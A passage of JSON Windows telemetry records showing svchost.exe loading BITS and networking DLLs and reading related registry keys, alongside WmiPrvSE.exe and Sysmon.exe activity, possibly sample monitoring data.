"{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bcd.dll", - "image_path": "C:\\Windows\\System32\\bcd.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "netprofm.dll", - "image_path": "C:\\Windows\\System32\\netprofm.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "npmproxy.dll", - "image_path": "C:\\Windows\\System32\\npmproxy.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bitsigd.dll", - "image_path": "C:\\Windows\\System32\\bitsigd.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457140000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "upnp.dll", - "image_path": "C:\\Windows\\System32\\upnp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457140000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ssdpapi.dll", - "image_path": "C:\\Windows\\System32\\ssdpapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "sxs.dll", - "image_path": "C:\\Windows\\System32\\sxs.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "AppXDeploymentClient.dll", - "image_path": "C:\\Windows\\System32\\AppXDeploymentClient.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "StateRepository.Core.dll", - "image_path": "C:\\Windows\\System32\\StateRepository.Core.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", - "registry_value": "Start", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "Windows.Storage.OneCore.dll", - "image_path": "C:\\Windows\\System32\\Windows.Storage.OneCore.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573457290000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "WsmAuto.dll", - "image_path": "C:\\Windows\\System32\\WsmAuto.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "miutils.dll", - "image_path": "C:\\Windows\\System32\\miutils.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "WsmSvc.dll", - "image_path": "C:\\Windows\\System32\\WsmSvc.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "pcwum.dll", - "image_path": "C:\\Windows\\System32\\pcwum.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "mi.dll", - "image_path": "C:\\Windows\\System32\\mi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "userenv.dll", - "image_path": "C:\\Windows\\System32\\userenv.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "gpapi.dll", - "image_path": "C:\\Windows\\System32\\gpapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883573458080000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "webio.dll", - "image_path": "C:\\Windows\\System32\\webio.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573458230000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "usermgrcli.dll", - "image_path": "C:\\Windows\\System32\\usermgrcli.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ExecModelClient.dll", - "image_path": "C:\\Windows\\System32\\ExecModelClient.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "twinapi.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "rmclient.dll", - "image_path": "C:\\Windows\\System32\\rmclient.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "coml2.dll", - "image_path": "C:\\Windows\\System32\\coml2.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreCommonProxyStub.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "execmodelproxy.dll", - "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883573478860000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ResourcePolicyClient.dll", - "image_path": "C:\\Windows\\System32\\ResourcePolicyClient.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "vssapi.dll", - "image_path": "C:\\Windows\\System32\\vssapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "vsstrace.dll", - "image_path": "C:\\Windows\\System32\\vsstrace.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "samlib.dll", - "image_path": "C:\\Windows\\System32\\samlib.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "es.dll", - "image_path": "C:\\Windows\\System32\\es.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479009984, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "BitsProxy.dll", - "image_path": "C:\\Windows\\System32\\BitsProxy.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "BitsProxy.dll", - "image_path": "C:\\Windows\\System32\\BitsProxy.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "esentprf.dll", - "image_path": "C:\\Windows\\System32\\esentprf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479330000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479480000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573479640000, - "unique_pid": 